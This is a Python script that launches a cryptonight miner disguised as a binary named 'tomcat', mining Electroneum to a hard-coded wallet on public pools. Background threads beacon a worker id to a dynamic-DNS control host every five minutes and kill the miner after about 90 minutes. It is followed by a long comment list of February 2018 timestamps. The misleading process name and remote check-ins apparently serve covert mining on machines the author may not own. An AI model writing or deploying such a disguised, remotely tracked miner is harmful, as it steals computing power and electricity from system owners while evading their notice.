import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:03.394003
#2018-02-17 16:59:07.902883
#2018-02-17 18:48:05.357279
#2018-02-17 20:37:07.463392
#2018-02-17 22:23:05.515739
#2018-02-18 00:07:04.380112
#2018-02-18 01:58:04.594073
#2018-02-18 03:47:04.834811
#2018-02-18 05:33:07.456393
#2018-02-18 07:26:05.397284
#2018-02-18 09:13:05.098275
#2018-02-18 10:59:06.986414
#2018-02-18 12:46:03.566288
#2018-02-18 14:34:05.318140
#2018-02-18 16:24:07.699554
#2018-02-18 18:13:06.163945
#2018-02-18 19:59:07.227607
#2018-02-18 21:47:04.898525
#2018-02-18 23:35:07.215971
#2018-02-19 01:21:01.436299
#2018-02-19 03:09:01.843219
#2018-02-19 04:54:06.093834
#2018-02-19 06:38:06.702591
#2018-02-19 08:27:06.630274
#2018-02-19 10:16:07.407821
#2018-02-19 12:03:07.147028
#2018-02-19 13:49:04.051867
#2018-02-19 15:37:08.194011
#2018-02-19 17:24:04.397844
#2018-02-19 19:12:01.808859
#2018-02-19 20:58:01.923508
#2018-02-19 22:45:07.892093
#2018-02-20 00:29:06.454544
#2018-02-20 02:16:01.620056
#2018-02-20 04:07:01.406596
#2018-02-20 05:50:06.357657
#2018-02-20 07:36:05.872376
#2018-02-20 09:20:09.529790
#2018-02-20 11:04:01.926224
#2018-02-20 12:51:09.482088
#2018-02-20 14:36:05.099416
#2018-02-20 16:21:09.388131
#2018-02-20 18:07:05.251923
#2018-02-20 19:57:08.816281
#2018-02-20 21:46:08.601162
#2018-02-20 23:29:04.161615
#2018-02-21 01:14:08.223465
#2018-02-21 03:02:01.243035
#2018-02-21 04:49:06.007501
#2018-02-21 06:38:07.617585
#2018-02-21 08:26:01.451562
#2018-02-21 10:11:06.352983
#2018-02-21 11:58:11.231450
#2018-02-21 13:48:01.534687
#2018-02-21 15:34:01.744403
#2018-02-21 17:23:06.358882
#2018-02-21 19:12:04.949530
#2018-02-21 21:01:08.680351
#2018-02-21 22:47:07.156343
#2018-02-22 00:33:05.821643
#2018-02-22 02:20:05.507725
#2018-02-22 04:07:05.700403
#2018-02-22 05:52:07.529160
#2018-02-22 07:37:02.135016
#2018-02-22 09:25:04.872573
#2018-02-22 11:11:01.257050
#2018-02-22 12:56:10.718017
#2018-02-22 14:43:05.809890
#2018-02-22 16:27:07.192330
#2018-02-22 18:15:08.179048
#2018-02-22 20:04:07.381125
#2018-02-22 21:53:02.247957
#2018-02-22 23:42:07.762187
#2018-02-23 01:31:07.256172
#2018-02-23 03:17:06.317706
#2018-02-23 05:03:07.896926
#2018-02-23 06:49:06.080465
#2018-02-23 08:38:08.416195
#2018-02-23 10:53:08.050905
#2018-02-23 12:50:09.694002
#2018-02-23 14:35:06.726311
#2018-02-23 16:24:08.237013
#2018-02-23 18:12:01.258287
#2018-02-23 19:57:05.260598
#2018-02-23 21:42:01.733879
#2018-02-23 23:34:01.947838
#2018-02-24 01:22:01.458885
#2018-02-24 03:12:06.803821
#2018-02-24 04:57:04.265045
#2018-02-24 06:46:02.231362
#2018-02-24 08:32:04.816005
#2018-02-24 10:19:05.049892
#2018-02-24 12:14:04.270621
#2018-02-24 14:02:05.476602
#2018-02-24 15:52:03.408493
#2018-02-24 17:43:05.082307
#2018-02-24 19:27:06.863314
#2018-02-24 21:17:04.959635
#2018-02-24 23:54:03.503679
#2018-02-25 03:47:06.056134
#2018-02-25 07:32:06.727721